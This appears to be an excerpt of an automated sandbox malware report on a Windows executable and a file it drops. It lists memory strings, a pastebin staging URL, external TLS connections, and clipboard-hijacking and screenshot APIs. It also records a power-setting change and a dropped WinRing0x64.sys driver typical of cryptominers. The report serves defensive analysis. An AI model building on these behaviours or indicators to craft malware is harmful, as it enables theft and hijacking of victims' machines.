Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003071000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, logs.uce0.10.dr, logs.uce1.10.dr, logs.uce.10.dr String found in binary or memory: https://pastebin.com/raw/YpJeSRBC
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: setupx 1.exe1.exe, 00000002.00000003.1083770178.00000000037E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49694 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49699 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, 2_2_0043E5B0
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_03581000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber, 2_2_03581000
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, 2_2_0043E5B0
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043F276 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 2_2_0043F276

System Summary
barindex
Uses powercfg.exe to modify the power settings
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Creates driver files
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe File created: C:\ProgramData\Dllhost\WinRing0x64.sys Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC6460 0_2_00CC6460
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8553B 0_2_00C8553B
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC4CB0 0_2_00CC4CB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA1F50 0_2_00CA1F50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C950E0 0_2_00C950E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA00E0 0_2_00CA00E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9A0F0 0_2_00C9A0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD90F0 0_2_00CD90F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDE0F0 0_2_00CDE0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEB0F0 0_2_00CEB0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC6090 0_2_00CC6090
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDC050 0_2_00CDC050
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBD070 0_2_00CBD070
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDD070 0_2_00CDD070
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C81000 0_2_00C81000
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD6010 0_2_00CD6010
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAE020 0_2_00CAE020
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8E030 0_2_00C8E030
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEA030 0_2_00CEA030
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C841D0 0_2_00C841D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE41D0 0_2_00CE41D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9F190 0_2_00C9F190
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C901A0 0_2_00C901A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C99150 0_2_00C99150
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB7170 0_2_00CB7170
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB0110 0_2_00CB0110
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD4110 0_2_00CD4110
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB8130 0_2_00CB8130
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CF22CA 0_2_00CF22CA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C872E0 0_2_00C872E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA5290 0_2_00CA5290
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C982B0 0_2_00C982B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE12B0 0_2_00CE12B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC0240 0_2_00CC0240
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8D250 0_2_00C8D250
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA3200 0_2_00CA3200
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE2210 0_2_00CE2210
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CF8230 0_2_00CF8230
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC93D0 0_2_00CC93D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE93E0 0_2_00CE93E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAA3F0 0_2_00CAA3F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9E3A0 0_2_00C9E3A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB53A0 0_2_00CB53A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDD3B0 0_2_00CDD3B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CCA350 0_2_00CCA350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD0350 0_2_00CD0350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDC350 0_2_00CDC350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA9360 0_2_00CA9360
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8A300 0_2_00C8A300
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C88310 0_2_00C88310
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9B310 0_2_00C9B310
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA7320 0_2_00CA7320
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC1320 0_2_00CC1320
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAD330 0_2_00CAD330
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE3330 0_2_00CE3330
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD84C0 0_2_00CD84C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CEA4C0 0_2_00CEA4C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAE490 0_2_00CAE490
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C92450 0_2_00C92450
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA5450 0_2_00CA5450
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9D410 0_2_00C9D410
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB6410 0_2_00CB6410
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE8420 0_2_00CE8420
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C90430 0_2_00C90430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C94430 0_2_00C94430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD3430 0_2_00CD3430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA55C0 0_2_00CA55C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBF5D0 0_2_00CBF5D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE95D0 0_2_00CE95D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00D05592 0_2_00D05592
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBC5A0 0_2_00CBC5A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBB560 0_2_00CBB560
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD9576 0_2_00CD9576
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C93510 0_2_00C93510
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C96530 0_2_00C96530
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA3530 0_2_00CA3530
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDF530 0_2_00CDF530
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C976C0 0_2_00C976C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAC6D0 0_2_00CAC6D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB86E0 0_2_00CB86E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBD6E0 0_2_00CBD6E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8B6F0 0_2_00C8B6F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA66F0 0_2_00CA66F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8E690 0_2_00C8E690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD5690 0_2_00CD5690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE4640 0_2_00CE4640
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC9650 0_2_00CC9650
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC1660 0_2_00CC1660
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDA660 0_2_00CDA660
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8C610 0_2_00C8C610
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C90620 0_2_00C90620
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD7630 0_2_00CD7630
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE1630 0_2_00CE1630
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8D7F0 0_2_00C8D7F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD07F0 0_2_00CD07F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C99740 0_2_00C99740
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8A700 0_2_00C8A700
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00D03718 0_2_00D03718
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD5700 0_2_00CD5700
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C89718 0_2_00C89718
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA28C0 0_2_00CA28C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA98A0 0_2_00CA98A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC78A0 0_2_00CC78A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C93840 0_2_00C93840
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C85856 0_2_00C85856
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9F860 0_2_00C9F860
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBC870 0_2_00CBC870
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE2800 0_2_00CE2800
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9D810 0_2_00C9D810
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBA810 0_2_00CBA810
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBE9C0 0_2_00CBE9C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDD980 0_2_00CDD980
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C88990 0_2_00C88990
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C989A0 0_2_00C989A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C96940 0_2_00C96940
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8B960 0_2_00C8B960
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CED90A 0_2_00CED90A
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9E900 0_2_00C9E900
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB8900 0_2_00CB8900
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8C906 0_2_00C8C906
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD6920 0_2_00CD6920
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C89AF6 0_2_00C89AF6
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA3A90 0_2_00CA3A90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C97AA0 0_2_00C97AA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB8AA0 0_2_00CB8AA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE7AB0 0_2_00CE7AB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDBA40 0_2_00CDBA40
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB3A50 0_2_00CB3A50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC8A70 0_2_00CC8A70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD1A00 0_2_00CD1A00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE3A20 0_2_00CE3A20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CACA30 0_2_00CACA30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CADA30 0_2_00CADA30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAABF0 0_2_00CAABF0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBABF0 0_2_00CBABF0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9DB80 0_2_00C9DB80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C90B90 0_2_00C90B90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C91BA0 0_2_00C91BA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD7BB0 0_2_00CD7BB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CCEB40 0_2_00CCEB40
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C97B50 0_2_00C97B50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8CB0F 0_2_00C8CB0F
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C87B00 0_2_00C87B00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C9EC70 0_2_00C9EC70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB3C70 0_2_00CB3C70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA2C00 0_2_00CA2C00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE1C00 0_2_00CE1C00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C94C10 0_2_00C94C10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBDDD9 0_2_00CBDDD9
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C88DD0 0_2_00C88DD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CB7DD0 0_2_00CB7DD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C90DE0 0_2_00C90DE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC7DF0 0_2_00CC7DF0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C85DF6 0_2_00C85DF6
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA2D80 0_2_00CA2D80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBDD80 0_2_00CBDD80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE3D60 0_2_00CE3D60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA9D00 0_2_00CA9D00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDFD00 0_2_00CDFD00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBFD20 0_2_00CBFD20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C89D30 0_2_00C89D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CBAEC0 0_2_00CBAEC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CCAEE0 0_2_00CCAEE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC2E80 0_2_00CC2E80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDAE80 0_2_00CDAE80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC3EA0 0_2_00CC3EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA5EB0 0_2_00CA5EB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8DE60 0_2_00C8DE60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA0E10 0_2_00CA0E10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CE7E10 0_2_00CE7E10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CAFE20 0_2_00CAFE20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA6FC0 0_2_00CA6FC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CD2FC0 0_2_00CD2FC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CC6F90 0_2_00CC6F90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDFF90 0_2_00CDFF90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C8BF10 0_2_00C8BF10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CA2F10 0_2_00CA2F10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CDEF10 0_2_00CDEF10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00C93F20 0_2_00C93F20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00442800 2_2_00442800
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042C010 2_2_0042C010
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00411839 2_2_00411839
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040F167 2_2_0040F167
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044816C 2_2_0044816C
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00410993 2_2_00410993
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040BA20 2_2_0040BA20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041BAC1 2_2_0041BAC1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00417B20 2_2_00417B20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00446400 2_2_00446400
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044BCE0 2_2_0044BCE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00412CAF 2_2_00412CAF
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040E560 2_2_0040E560
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00412575 2_2_00412575
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044C5B0 2_2_0044C5B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00427E50 2_2_00427E50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00437E65 2_2_00437E65
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00420EA0 2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042F760 2_2_0042F760
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044AF80 2_2_0044AF80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00401040 2_2_00401040
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044B840 2_2_0044B840
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00431850 2_2_00431850
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00413870 2_2_00413870
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00444070 2_2_00444070
